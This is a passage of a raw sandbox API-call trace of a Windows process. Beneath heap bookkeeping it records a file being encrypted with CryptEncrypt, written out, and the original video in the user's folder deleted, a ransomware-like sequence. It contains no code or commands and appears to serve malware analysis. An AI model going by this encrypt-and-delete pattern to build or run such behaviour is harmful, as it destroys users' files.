dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b78 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.687] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab608 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854d28 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.687] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0212.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854d28 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.689] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.689] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab5f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.694] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x131b0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x131b8) returned 1 [0212.694] CharLowerBuffW (in: lpsz="byte[78264]", cchLength=0xb | out: lpsz="byte[78264]") returned 0xb [0212.696] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.696] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.696] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab500, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.696] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x131b0, dwBufLen=0x131b8 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x131b8) returned 1 [0212.701] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.701] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.701] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.701] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.702] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.702] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.710] WriteFile (in: hFile=0x504, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x131b8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x131b8, lpOverlapped=0x0) returned 1 [0212.712] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.712] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.712] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.712] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab470, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.712] CryptDestroyKey (hKey=0x9e2238) returned 1 [0212.712] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.712] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.712] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.712] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.712] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.712] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.716] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.716] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.716] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.716] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.716] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.716] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.717] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.717] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.717] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.717] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.717] CryptReleaseContext (hProv=0xa7ca18, dwFlags=0x0) returned 1 [0212.717] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.717] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.717] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.717] CloseHandle (hObject=0x4f4) returned 1 [0212.719] CloseHandle (hObject=0x504) returned 1 [0212.724] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.724] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.724] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/kmyLNxqbxySO-S_H2O9.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\kmyLNxqbxySO-S_H2O9.mp4", lpFilePart=0x8cedf4*="kmyLNxqbxySO-S_H2O9.mp4") returned 0x2e [0212.724] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kmyLNxqbxySO-S_H2O9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kmylnxqbxyso-s_h2o9.mp4")) returned 0x20 [0212.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\kmyLNxqbxySO-S_H2O9.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6658ee30, ftCreationTime.dwHighDateTime=0x1d5ccec, ftLastAccessTime.dwLowDateTime=0xddbbbdd0, ftLastAccessTime.dwHighDateTime=0x1d5d1fc, ftLastWriteTime.dwLowDateTime=0xddbbbdd0, ftLastWriteTime.dwHighDateTime=0x1d5d1fc, nFileSizeHigh=0x0, nFileSizeLow=0x131b0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="kmyLNxqbxySO-S_H2O9.mp4", cAlternateFileName="KMYLNX~1.MP4")) returned 0x9e1bf8 [0212.724] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kmyLNxqbxySO-S_H2O9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kmylnxqbxyso-s_h2o9.mp4")) returned 1 [0212.728] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6658ee30, ftCreationTime.dwHighDateTime=0x1d5ccec, ftLastAccessTime.dwLowDateTime=0xddbbbdd0, ftLastAccessTime.dwHighDateTime=0x1d5d1fc, ftLastWriteTime.dwLowDateTime=0xddbbbdd0, ftLastWriteTime.dwHighDateTime=0x1d5d1fc, nFileSizeHigh=0x0, nFileSizeLow=0x131b0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, 